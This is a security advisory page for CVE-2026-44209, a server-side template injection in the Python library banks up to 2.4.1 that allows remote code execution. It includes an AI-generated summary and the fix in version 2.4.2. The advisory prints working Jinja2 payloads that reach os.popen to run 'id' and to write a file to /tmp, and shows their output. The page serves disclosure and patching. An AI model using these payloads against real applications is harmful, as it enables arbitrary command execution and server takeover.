VYPR
← All advisories
High severityGHSA Advisory· Published May 8, 2026

banks has Critical Remote Code Execution (RCE) via Jinja2 SSTI

CVE-2026-44209

Description

Summary

banks <= 2.4.1 uses jinja2.Environment() (unsandboxed) to render prompt templates. Applications that pass user-supplied strings as the template argument to Prompt() are vulnerable to Server-Side Template Injection (SSTI), which can lead to Remote Code Execution (RCE) on the host system.

This is a vulnerability in how banks initializes its Jinja2 environment — not in Jinja2 itself.

Vulnerable

Code

src/banks/env.py — the global Jinja2 environment is created without sandboxing:

env = Environment(
    autoescape=select_autoescape(enabled_extensions=("html", "xml"), default_for_string=False),
    ...
)

Attack

Scenario

An application that stores prompt templates in a database, accepts them via an API, or loads them from a user-supplied config file and passes them to Prompt() is vulnerable. For example:

# User-controlled input reaches Prompt()
user_input = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}"
p = Prompt(user_input)
p.text()  # Executes arbitrary command on the host

Proof of

Concept

Setup: ``bash pip install banks==2.4.1 ``

PoC script: ``python from banks import Prompt payload = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}" p = Prompt(payload) result = p.text() print(f"[+] Output: {result}") ``

Confirmed output: `` [+] Output: uid=1000(ak) gid=1000(ak) groups=1000(ak),27(sudo),... text **File-write proof:** ``python

from banks import Prompt

p = Prompt("{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo POC > /tmp/rce_banks_exec').read() }}") p.text() `` ``bash

ls -l /tmp/rce_banks_exec # -rw-rw-r-- 1 ak ak 4 Apr 27 15:36 /tmp/rce_banks_exec `` ## Impact Applications that allow end-users to supply or customize prompt templates are at risk of full Remote Code Execution, including arbitrary command execution, data exfiltration, and server compromise. ## Fix Fixed in banks 2.4.2 (PR #74) by switching to jinja2.sandbox.SandboxedEnvironment, which blocks the dunder attribute traversal chain this exploit relies on. Developers on banks <= 2.4.1 should upgrade to 2.4.2 and avoid passing untrusted user input as the template argument to Prompt()`. ## Resources - Fix: https://github.com/masci/banks/pull/74 - CVE-2024-41950 (Haystack — identical root cause, CVSS 7.5) - CVE-2025-25362 (spacy-llm — identical root cause) - CWE-1336: Improper Neutralization of Special Elements in a Template Engine

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Banks <=2.4.1 uses an unsandboxed Jinja2 environment, allowing SSTI to RCE when user input is passed as a template to Prompt().

Vulnerability

CVE-2026-44209 is a Server-Side Template Injection (SSTI) vulnerability in the banks library (versions ≤2.4.1). The root cause is that src/banks/env.py initializes a Jinja2 environment using jinja2.Environment() without sandboxing, which permits template expressions to access Python builtins and execute arbitrary code [2]. This is not a flaw in Jinja2 itself but in how banks configures it.

Exploitation

An attacker can exploit this by supplying a malicious template string to the Prompt() class, for example via an API endpoint, a database-stored template, or a user-supplied config file. The canonical payload uses the self.__init__.__globals__.__builtins__ chain to import os and run shell commands. A proof-of-concept demonstrates executing id and writing a file to /tmp [2]. No authentication is required if the application exposes the vulnerable functionality to untrusted users.

Impact

Successful exploitation leads to full Remote Code Execution (RCE) on the host system. An attacker can execute arbitrary commands, exfiltrate sensitive data, or compromise the server entirely [2].

Mitigation

The vulnerability is fixed in banks version 2.4.2, which switches to jinja2.sandbox.SandboxedEnvironment to block dunder attribute traversal [3]. Users should upgrade immediately and ensure that untrusted user input is never passed as a template string.

References
  1. Critical Remote Code Execution (RCE) via Jinja2 SSTI
  2. fix: prevent SSTI by switching to SandboxedEnvironment by masci · Pull Request #74 · masci/banks

AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
banksPyPI
< 2.4.22.4.2

Affected products

2
  • Masci/BanksGHSA2 versions
    <= 2.4.1+ 1 more
    • (no CPE)range: <= 2.4.1
    • (no CPE)range: <=2.4.1

Patches

0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

3

News mentions

0

No linked articles in our index yet.